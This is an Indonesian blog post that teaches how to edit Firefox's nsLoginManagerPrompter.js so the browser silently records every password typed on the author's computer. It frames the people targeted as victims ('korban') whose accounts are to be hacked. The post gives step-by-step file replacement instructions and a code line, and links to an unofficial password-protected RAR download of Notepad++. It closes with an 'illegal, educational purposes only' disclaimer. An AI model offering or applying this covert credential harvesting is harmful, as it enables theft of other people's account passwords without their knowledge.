Jadikan Firefox menyimpan passwords secara otomatis

Posted by Unknown 1 komentar
bagi anda yang punya kompi yang suka di pinjem teman2 anda buat login sebuah akun. ane punya trik yahud buat menyimpan passwords mereka secara otomatis tanpa pemberitahuan bar.

Biasanya, setiap kali Anda mencoba untuk login ke account Anda, Firefox akan menanyakan apakah informasi login Anda harus disimpan atau tidak. Firefox akan mengingat kata sandi Anda hanya jika anda menekan pada "Ingat".
Tapi, bar ini konfirmasi menjadi masalah ketika korban mencoba untuk login ke account-nya menggunakan komputer Anda. Jadi, untuk hack account account password korban Anda, kami akan menghapus bar ini konfirmasi dan mengkonfigurasi Firefox untuk otomatis menyimpan sandi setiap tanpa meminta konfirmasi apapun.
CATATAN: - TRIK INI TIDAK BEKERJA PADA Firefox 4.
Catatan: Jika Anda mencoba hack ini, ingatlah untuik membackup nsloginmanagerprompter.js default anda sebelum melanjutkan. Untuk itu, kunjungi
C: \ Program Files \ Mozilla Firefox \ Componenets
dan menyalin file nsloginmanagerprompter.js. Simpan file ini disalin ke lokasi yang aman sehingga Anda bisa menggunakan file ini untuk rollback konfigurasi default Firefox.
Langkah-langkah untuk Hack Account : -
1. Download Notepad + + dan menginstalnya pada komputer Anda. anda bisa mendapatkannya di http://www.ziddu.com/download/14447563/Notepad_By_TRICKS4INDYA.rar.html Password: TRICKS4INDYA
2. Pergi ke C: \ Program Files \ Mozilla Firefox \ Komponen
dan mencari file nsloginmanagerprompter.js. Klik kanan di atasnya dan tekan "Edit dengan Notepad + +".
3. Sekarang, pindah ke jalur 804. Ganti seluruh kode dari baris 804 ke baris 869 dengan kode berikut:
var pwmgr = this._pwmgr; pwmgr.addLogin (aLogin);

4. Sekarang, buka File -> Save As dan menyimpan file di Desktop Anda. Sekarang, salin file ini dan paste di folder Components (C: \ Program Files \ Mozilla Firefox \ Komponen). Anda akan ditanya apakah akan mengganti file yang ada. Hit on "Salin dan Ganti".
Itu saja. Kami telah dikonfigurasi Firefox dan sekarang, setiap kali ada yang mencoba login ke account-nya menggunakan Firefox, informasi login-nya akan otomatis disimpan oleh Firefox tanpa meminta konfirmasi apapun. Anda dapat mencoba ini di Firefox.
Untuk melihat password disimpan otomatis pergi ke Tools -> Options -> Security. Hit on "Saved Passwords" dan pada kotak popup, tekan pada "Show Passwords". dengan demikian paswords teman anda bakalan tersimpan secara otomatis.Jadi teman-teman, mudah kan. ..
Catatan: Ini adalah ilegal dan untuk tujuan pendidikan saja. Setiap kehilangan / terjadi kerusakan akan menjadi tanggung jawab anda kepada sang pencipta. sekan dan terimakasih..


jika berminat, silahkan download gratis Opera browser di bawah ini. 
TERIMA KASIH ATAS KUNJUNGAN SAUDARA
Judul: Jadikan Firefox menyimpan passwords secara otomatis
Ditulis oleh Unknown
Rating Blog 5 dari 5
Semoga artikel ini bermanfaat bagi saudara. Jika ingin mengutip, baik itu sebagian atau keseluruhan dari isi artikel ini harap menyertakan link dofollow ke http://aljihad99.blogspot.com/2011/04/jadikan-firefox-menyimpan-passwords.html. Terima kasih sudah singgah membaca artikel ini.

1 komentar:

Obat Herbal mengatakan...

tips yang cukup berbahaya gan hehehehe,,,

Posting Komentar

silahkan tinggalkan komentar anda

Template by Berita Update - Trik SEO Terbaru. Original design by Bamz | Copyright of W-Rock.